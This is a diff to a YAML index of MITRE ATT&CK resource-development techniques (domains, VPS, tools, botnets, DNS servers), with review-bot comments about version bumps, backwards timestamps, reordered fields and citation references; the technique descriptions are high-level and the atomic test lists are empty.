- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
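Review bot: the new Route53 paragraph describes domain registration happening inside a compromised customer environment, which is the one part of this technique that is observable from the victim's side rather than outside the target's visibility; the data sources listed for T1583.001 in the next hunk ('Domain Name: Passive DNS', 'Domain Name: Domain Registration') do not reflect that cloud-account view, so consider whether the detection guidance or data sources should be extended in the same change. Also confirm the new citation key 'Invictus IR DangerDev 2024' has a matching external_references entry (it is added two hunks below). The blank lines inserted inside the '|-' block scalar are fine and produce the intended paragraph breaks.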
@@ -52817,7 +53490,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -52856,6 +53529,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -52911,7 +53588,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -52969,7 +53645,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -53049,7 +53724,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -53109,7 +53783,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -53131,7 +53804,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
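Review bot: the modified timestamp for T1588.001 goes backwards, from '2022-04-25T14:00:00.188Z' to '2021-10-17T16:15:52.805Z', and the same regression appears later in this patch for T1586, T1584.005, T1585.001, T1587.004, T1608.003 and T1584.002. A regenerated index should not move modified earlier unless the upstream source actually changed; confirm the generator is reading the intended ATT&CK release, and check that nothing consuming this index uses modified for change detection, where a backwards step would be treated as no change or as stale data.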
@@ -53150,42 +53823,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
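Review bot: for T1588.001 both spec_version: '2.1' and x_mitre_attack_spec_version: 2.1.0 are removed and no replacement x_mitre_attack_spec_version appears in the hunks shown for that object, unlike T1586.003 above where the field is kept and bumped to 3.2.0; the same double removal happens for T1585.001, T1587.004 and T1608.003 further down. Confirm the field is set elsewhere in those objects, otherwise the index ends up inconsistent between techniques that carry an ATT&CK spec version and ones that do not. The T1583.003 block removed in the rest of this hunk (id, created, created_by_ref and four external_references) is re-added with the same values in the next hunk, so that part is a reorder only.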
@@ -53194,22 +53835,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
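Review bot: the rebuilt T1583.003 object carries over all four references (Koczwara Beacon Hunting Sep 2021, TrendmicroHideoutsLease, Mandiant SCANdalous Jul 2020, ThreatConnect Infrastructure Dec 2020) with the same URLs and dates, adds revoked: false and x_mitre_deprecated: false, and bumps x_mitre_attack_spec_version from 2.1.0 to 3.2.0 while leaving x_mitre_version at '1.1'. That is consistent with a re-export without content change, but modified jumps to 2024-10-15 with no text change visible in this hunk, so if the description or detection text changed outside the shown context the x_mitre_version should be revisited.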
@@ -53223,7 +53895,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -53310,11 +53982,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
@@ -53374,7 +54045,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -53416,7 +54086,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53431,7 +54101,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -53522,11 +54191,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -53559,15 +54227,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
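Review bot: the '(including one-time, single use links)' addition mirrors the '(including one-time, single use domain names)' text added to T1583.001 earlier in this patch, where x_mitre_version was bumped from '1.3' to '1.4'; no x_mitre_version change for T1608.005 appears in the hunks shown, so check that the version was bumped consistently. The rewrapped lines of the double-quoted scalar fold back to single spaces, so citation tags now split across lines such as '(Citation: iOS URL Scheme)' still resolve.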
@@ -53651,7 +54320,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -53705,7 +54373,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -53756,36 +54423,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -53794,21 +54435,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
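Review bot: the 'Recorded Future Beacon 2019' URL changes from /identifying-cobalt-strike-servers/ to /blog/identifying-cobalt-strike-servers with the retrieval date updated to September 16, 2024, matching the new modified timestamp, and both citation keys used in the T1588.002 text ('Recorded Future Beacon 2019', 'Analyzing CS Dec 2020') survive the rebuild. The T1588 object at the end of this patch cites a different Recorded Future page ('Recorded Future Beacon Certificates', https://www.recordedfuture.com/cobalt-strike-servers/) that is removed there; check that its re-added form receives the same URL refresh.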
@@ -53854,17 +54521,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -53890,7 +54556,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -53922,8 +54588,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
@@ -53950,7 +54614,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -53974,8 +54638,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -54001,7 +54663,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -54035,8 +54697,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -54084,7 +54744,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -54100,7 +54760,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -54159,54 +54818,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
